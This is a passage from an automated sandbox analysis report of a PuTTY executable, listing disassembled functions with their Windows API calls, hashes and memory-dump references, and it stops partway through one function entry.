                            • Opcode ID: 66a33fbd5de952709c23a8f622c9aa41f5749d73c51408ccc3ca3429cdca60e8
                            • Instruction ID: 0ab2d3de31b3bbd14c688a99d208fd933f99c4f695b7087d890053f229a79182
                            • Opcode Fuzzy Hash: 66a33fbd5de952709c23a8f622c9aa41f5749d73c51408ccc3ca3429cdca60e8
                            • Instruction Fuzzy Hash: 2001DB31A487119BFF28962CDC45D1A33A29B5032072B885FE00156651E76CE882864E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043AF49 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                            Download Yara Rule
                            APIs
                            • IsDlgButtonChecked.USER32(?,?), ref: 0043AF91
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ButtonChecked
                            • String ID: !"No radio button was checked?!"$..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_RADIO
                            • API String ID: 1719414920-1897624
                            • Opcode ID: 2fbeda967dd03708850fb25ceb80add29a75892d05b8c2bdeb71c7a13f1b6515
                            • Instruction ID: 4307d8de60f35bc9c125d62655d8905c7bf9af90a5db953e1aac1184263635f1
                            • Opcode Fuzzy Hash: 2fbeda967dd03708850fb25ceb80add29a75892d05b8c2bdeb71c7a13f1b6515
                            • Instruction Fuzzy Hash: 9301A2B1784211AFD7109F55DCC2E167799AB88B09B15043BF18497156D725EC208B5B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043D7CA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40windowCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteMenu.USER32(00000000,00000400), ref: 0043D7D7
                            • AppendMenuA.USER32(00000000,00001000,?), ref: 0043D817
                            • AppendMenuA.USER32(00000001,00001000,(No sessions)), ref: 0043D836
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Menu$Append$Delete
                            • String ID: (No sessions)
                            • API String ID: 2878686843-1102551510
                            • Opcode ID: dce0ca7f981a9f22f3534081cd750e5f6ff1816cbf0e0a62624acc8791dbd5a0
                            • Instruction ID: f49cdf8f3f3307d91f57067d28d7f3f08e96c740ad7831f45a4cbcd0077898b4
                            • Opcode Fuzzy Hash: dce0ca7f981a9f22f3534081cd750e5f6ff1816cbf0e0a62624acc8791dbd5a0
                            • Instruction Fuzzy Hash: 8EF0F0317407106FF7262714BC81F4E3619F348752F201036FA05EF1A0CAD1AC81869C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00449B27 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID: %d:
                            • API String ID: 1497175149-106572296
                            • Opcode ID: 65540beaccca933f26d0187f7bea7cc7d3b4071e6ca7eb58befcadec2a26f43e
                            • Instruction ID: 659af9995e171c0f61a6d89fd239539e364f9fc6904c6fcaffd3a77913681b25
                            • Opcode Fuzzy Hash: 65540beaccca933f26d0187f7bea7cc7d3b4071e6ca7eb58befcadec2a26f43e
                            • Instruction Fuzzy Hash: EED02B70F8671037920333A28C43F4F65855E95718F28441FB00561101DEBC8202969F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043D206 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            • CreateDialogParamA.USER32(0000006E,?,Function_0003C35C,00000000), ref: 0043D221
                            • ShowWindow.USER32(00000000,00000001), ref: 0043D22F
                            • SetActiveWindow.USER32(0044323A,?), ref: 0043D23B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$ActiveCreateDialogParamShow
                            • String ID: tG
                            • API String ID: 4156068129-1205533789
                            • Opcode ID: 397f3d1f5d5454133819a8d8ca852eddd373f1d48e5640986f45ff47b8ef3f96
                            • Instruction ID: ade1bfc52d1116a1050753679884149c710c2eb6f179962a27d0cedc70be964f
                            • Opcode Fuzzy Hash: 397f3d1f5d5454133819a8d8ca852eddd373f1d48e5640986f45ff47b8ef3f96
                            • Instruction Fuzzy Hash: 73E0E271548380AFDF215B60BE49B483F2AA708722F505435F608A60B2C6B680919B28
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00450A6C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(KERNEL32,0044CE02), ref: 00450A71
                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00450A81
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: IsProcessorFeaturePresent$KERNEL32
                            • API String ID: 1646373207-3105848591
                            • Opcode ID: ee1a8f1ef2d70afb66cd8128a7aa341000f63fbaa3709448050487b67d28213b
                            • Instruction ID: 655b7493ab9c65e4795a23c6a0c72cd44d5b7437b0918af64eab7dc941458a71
                            • Opcode Fuzzy Hash: ee1a8f1ef2d70afb66cd8128a7aa341000f63fbaa3709448050487b67d28213b
                            • Instruction Fuzzy Hash: A5C08074745303B9DD20D7F02C09F5621081B20B43F1048B2780ED00C2CE5CC804983D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0045368F Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON
                            Download Yara Rule
                            APIs
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000100,00000000,00000000), ref: 00453713
                            • GetLastError.KERNEL32 ref: 0045371D
                            • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 004537DD
                            • GetLastError.KERNEL32 ref: 004537E7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ErrorFileLastRead
                            • String ID:
                            • API String ID: 1948546556-0
                            • Opcode ID: b7816700115b025a195ab25b762053d7d31a6d08cdbc9e8db7edabb868ed1865
                            • Instruction ID: b7bd6c3a7c26b1af60907fe26dc6dcb6a567d3dffb515adc04b71fada42d6fca
                            • Opcode Fuzzy Hash: b7816700115b025a195ab25b762053d7d31a6d08cdbc9e8db7edabb868ed1865
                            • Instruction Fuzzy Hash: 9261C5709043859FDB15DF58C884BA97BF0AB05347F14809AEC659B393D378DB49CB19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00450C4F Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000001,00000200,?), ref: 00450D43
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: f6b24983639541292935f626734a5ec8d9e4286241e47b72aef1b1611294ea38
                            • Instruction ID: a969bbea8df429d58bf86740b6ff661964690a638af4d15dcf4b9f80b87b7139
                            • Opcode Fuzzy Hash: f6b24983639541292935f626734a5ec8d9e4286241e47b72aef1b1611294ea38
                            • Instruction Fuzzy Hash: 80518F35A042488FDB32CFA8CC44BED77B9EF46306F20412ADC999B252D7749A49CF19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044E247 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8a166783d9542662310f678d8e5bb62d7f98624a69f7f3a8390b869afddafc30
                            • Instruction ID: 1a268331b7e61a76e000b2efa5b48a88d8d480664a2467efd0d72df65805af68
                            • Opcode Fuzzy Hash: 8a166783d9542662310f678d8e5bb62d7f98624a69f7f3a8390b869afddafc30
                            • Instruction Fuzzy Hash: D7312971505621ABF6336A375C80B2B720CFF517A9F24012BFC44A3392EB6CDC41519D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00441416 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                            Download Yara Rule
                            APIs
                            • IsZoomed.USER32(00435016), ref: 0044141C
                            • IsZoomed.USER32 ref: 00441526
                            • SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000116), ref: 0044155C
                            • InvalidateRect.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,0000005E), ref: 00441574
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Zoomed$InvalidateRectWindow
                            • String ID:
                            • API String ID: 136671725-0
                            • Opcode ID: 25d9219c33fabfd9779d6956f764d9e7bc75a2891b71054e86d171e4e19a2356
                            • Instruction ID: d450196823400de4fabd091cd5ad00deaac455db78351cb4e3428a03b8494570
                            • Opcode Fuzzy Hash: 25d9219c33fabfd9779d6956f764d9e7bc75a2891b71054e86d171e4e19a2356
                            • Instruction Fuzzy Hash: B731C432604302AFF7209B25FD86EAA3BA9F780755F54403BF6099A1F1C675A8D0CA5C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043DD8F Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                            Download Yara Rule
                            APIs
                            • ExtTextOutW.GDI32(?,?,00000000,?,?,?,?,?), ref: 0043DE69
                            • GetBkMode.GDI32(?,?,?,?,?,?), ref: 0043DE78
                            • SetBkMode.GDI32(?,00000001), ref: 0043DE86
                            • SetBkMode.GDI32(?,?), ref: 0043DE9F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Mode$Text
                            • String ID:
                            • API String ID: 1768155863-0
                            • Opcode ID: 8e1da3781d15189fc478ba2d7e8fa8855d6db5b4fdedfc7efb575216b709582f
                            • Instruction ID: 93d0c036fb89ffb9c46a9724a8fccc490271c03040381eba4b1e18102b10ccd3
                            • Opcode Fuzzy Hash: 8e1da3781d15189fc478ba2d7e8fa8855d6db5b4fdedfc7efb575216b709582f
                            • Instruction Fuzzy Hash: FA417771D00209EFCF01CFA9D8859AEBFB2FF88354F20806AF805A7260D7359A51DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004560A4 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0045114E: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00451168
                              • Part of subcall function 0045114E: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00451179
                              • Part of subcall function 0045114E: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 004511BF
                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 004560E7
                            • MultiByteToWideChar.KERNEL32(?,00000009,00408DF6,00000000,00000000,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 00456104
                            • MultiByteToWideChar.KERNEL32(?,00000001,00408DF6,00000000,?,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 0045617A
                            • CompareStringW.KERNEL32(00000014,00457BC4,?,00000000,?,00000000,?,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014), ref: 00456190
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                            • String ID:
                            • API String ID: 1997773198-0
                            • Opcode ID: 5b332327d1be57060a787db2e31b9cd5237f4342aba13a1738be47696702df0f
                            • Instruction ID: 2191565a245315a13ea92b7d9e79c88c4ba22a0532689118c550df9fd50ae732
                            • Opcode Fuzzy Hash: 5b332327d1be57060a787db2e31b9cd5237f4342aba13a1738be47696702df0f
                            • Instruction Fuzzy Hash: 8431BE31801608EFDF219FA1EC45BAEBF76FF44715F61011AF814A72A2DB388995DB84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00453D16 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$___initmbctable_strcat
                            • String ID:
                            • API String ID: 109824703-0
                            • Opcode ID: 0cdeff6c20b79945775720aa75c7c0dfffcf38ab669d7f56969cb0ddbe30725f
                            • Instruction ID: 91f3398eaa43de68e8ff7f5ac13494d686c981882777af6b6889b76b6d273dc5
                            • Opcode Fuzzy Hash: 0cdeff6c20b79945775720aa75c7c0dfffcf38ab669d7f56969cb0ddbe30725f
                            • Instruction Fuzzy Hash: 3211337280D10459E7216FA6BC4066B77B5FB013ABBA4027FE99883253DB3D198DC78D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043A035 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                            Download Yara Rule
                            APIs
                            • #14.COMCTL32(?,?,?,?), ref: 0043A04E
                            • #14.COMCTL32(?,?,?,00000000), ref: 0043A06A
                            • #14.COMCTL32(?,?,?,00000000), ref: 0043A099
                            • #14.COMCTL32(?,?,?,00000000), ref: 0043A0A7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d5b63e4510a09a137cac1feff31e24234eebae79eddf2dd1777458bdc832039d
                            • Instruction ID: f811a9dd4b70f76a5ab64a6376941522f780d85d90b0bbf91ee3df03d2bed205
                            • Opcode Fuzzy Hash: d5b63e4510a09a137cac1feff31e24234eebae79eddf2dd1777458bdc832039d
                            • Instruction Fuzzy Hash: D8213971D4020CFFCF158F95CC80AAEBFB5EB88354F10906AE96566290C3359AA1DF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00440612 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowLongA.USER32(000000F0), ref: 0044061D
                            • SetWindowLongA.USER32(000000F0,00000000), ref: 0044067F
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000027), ref: 00440692
                            • CheckMenuItem.USER32(00000000,00000180,00000000), ref: 004406A6
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Window$Long$CheckItemMenu
                            • String ID:
                            • API String ID: 1924917330-0
                            • Opcode ID: 84a66ace17d8c37056de32eacdc3bd5dc5f048f234791d5711ec57f868a33eff
                            • Instruction ID: 0d719616f662c33dfc0c60b1945e003af54beddb96593dd0c80e23bea25490c2
                            • Opcode Fuzzy Hash: 84a66ace17d8c37056de32eacdc3bd5dc5f048f234791d5711ec57f868a33eff
                            • Instruction Fuzzy Hash: 7901B132948321BEEB301751BC48F172E55EB81732F26423AFE6E611F1CA261C70969C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00441113 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                            • IsZoomed.USER32 ref: 0044111F
                            • GetWindowLongA.USER32(000000F0,00000000), ref: 00441156
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: LongWindowZoomed
                            • String ID:
                            • API String ID: 220201945-0
                            • Opcode ID: 3ef14038be7ab91c0cf5db0de6c51f49c307a6090b8502a73216829f1b763bf8
                            • Instruction ID: c89a823f4fff9b52d36b2398697d0a1e48321d88215729031b78c468a56b693d
                            • Opcode Fuzzy Hash: 3ef14038be7ab91c0cf5db0de6c51f49c307a6090b8502a73216829f1b763bf8
                            • Instruction Fuzzy Hash: 85019632808216BFEB209BA5EC09D9E7F79EF04365B144235FD24A11F1DA35A850DB4C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043E6CF Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                            Download Yara Rule
                            APIs
                            • SetCaretPos.USER32(FFFFFFFF,FFFFFFFF), ref: 0043E6F8
                            • ImmGetContext.IMM32 ref: 0043E71C
                            • ImmSetCompositionWindow.IMM32(00000000,?), ref: 0043E73F
                            • ImmReleaseContext.IMM32(00000000,00000000,?), ref: 0043E74B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Context$CaretCompositionReleaseWindow
                            • String ID:
                            • API String ID: 3049481515-0
                            • Opcode ID: f0148493a8dc8864f31c3bac257ae5eeae3042a3bbd1982f4b70804224b8cc81
                            • Instruction ID: ec4624689284bf62d80ad4410351a5340c7ea317eae3f248e2f4657f55f1418f
                            • Opcode Fuzzy Hash: f0148493a8dc8864f31c3bac257ae5eeae3042a3bbd1982f4b70804224b8cc81
                            • Instruction Fuzzy Hash: 4D0144705022159BDB149F16DC89AA63BBDEB04706F14403AE808D32E1D334E984DF99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044A380 Relevance: 6.0, APIs: 4, Instructions: 40registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0044A3A8
                            • RegCloseKey.ADVAPI32(?), ref: 0044A3BE
                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 0044A3CC
                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 0044A3DD
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
